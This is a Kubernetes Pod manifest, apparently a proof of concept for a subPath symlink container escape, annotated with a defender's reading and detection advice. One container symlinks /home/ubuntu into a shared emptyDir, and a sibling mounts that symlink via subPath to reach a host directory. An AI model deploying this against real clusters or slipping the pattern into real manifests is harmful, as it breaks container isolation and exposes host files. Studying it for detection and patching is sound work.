---
# Pod "subpath": two unprivileged containers sharing an emptyDir ("escape-volume")
# plus a second emptyDir ("status-volume") used only as a ready flag.
#
# Defender's reading of this manifest:
#   - The "setup" container creates a symlink at /rootfs/host inside the shared
#     emptyDir, then drops /status/done and parks.
#   - The "exploit" container mounts the same emptyDir with `subPath: host`, i.e.
#     through the entry the sibling container turned into a symlink, and waits
#     for the ready flag before parking.
#   - A shared writable volume combined with a subPath mount of a path that a
#     sibling container controls is the pattern to alert on: audit/deny
#     `subPath` on volumes writable by another container of the same pod, and
#     keep kubelets on a release that validates subPath targets.
#   - The security context here is deliberately non-privileged (runAsUser 1000,
#     no privilege escalation, capabilities dropped), so a restrictive Pod
#     Security Standard alone should not be assumed to block this pattern.
apiVersion: v1
kind: Pod
metadata:
  name: subpath
spec:
  containers:
    # Prepares the shared volume: `ln -s /home/ubuntu /rootfs/host`, then signals
    # completion via /status/done. Image tag is unpinned and pulled on every start.
    - name: setup
      image: nginx:latest
      imagePullPolicy: Always
      securityContext:
        allowPrivilegeEscalation: false
        runAsUser: 1000
        capabilities:
          drop:
            - CHOWN
            - DAC_OVERRIDE
            - FOWNER
            - FSETID
            - KILL
            - SETGID
            - SETUID
            - SETPCAP
            - NET_BIND_SERVICE
            - NET_ADMIN
            - NET_RAW
            - MKNOD
            - AUDIT_WRITE
      command:
        - /bin/bash
      # NOTE(review): `rm -rf hostetc` removes a path nothing in this manifest
      # creates — presumably a leftover from an earlier variant; verify.
      args:
        - '-c'
        - 'cd /rootfs && rm -rf hostetc && ln -s /home/ubuntu /rootfs/host && touch /status/done && sleep infinity'
      volumeMounts:
        - name: escape-volume
          mountPath: /rootfs
        - name: status-volume
          mountPath: /status
    # Mounts the same emptyDir via `subPath: host` (the symlink created above) and
    # stays alive once /status/done exists; otherwise exits after 1s so the
    # kubelet restarts it.
    - name: exploit
      image: nginx:latest
      imagePullPolicy: Always
      securityContext:
        allowPrivilegeEscalation: false
        runAsUser: 1000
        capabilities:
          drop:
            - CHOWN
            - DAC_OVERRIDE
            - FOWNER
            - FSETID
            - KILL
            - SETGID
            - SETUID
            - SETPCAP
            - NET_BIND_SERVICE
            - NET_ADMIN
            - NET_RAW
            - MKNOD
            - AUDIT_WRITE
      command:
        - /bin/bash
      args:
        - '-c'
        - 'if [[ -f /status/done ]];then sleep infinity; else sleep 1; fi'
      volumeMounts:
        - name: escape-volume
          mountPath: /rootfs
          subPath: host
        - name: status-volume
          mountPath: /status
  # Both volumes are pod-local emptyDirs; "escape-volume" is the one shared
  # between the two containers and mounted with subPath by the second.
  volumes:
    - name: escape-volume
      emptyDir: {}
    - name: status-volume
      emptyDir: {}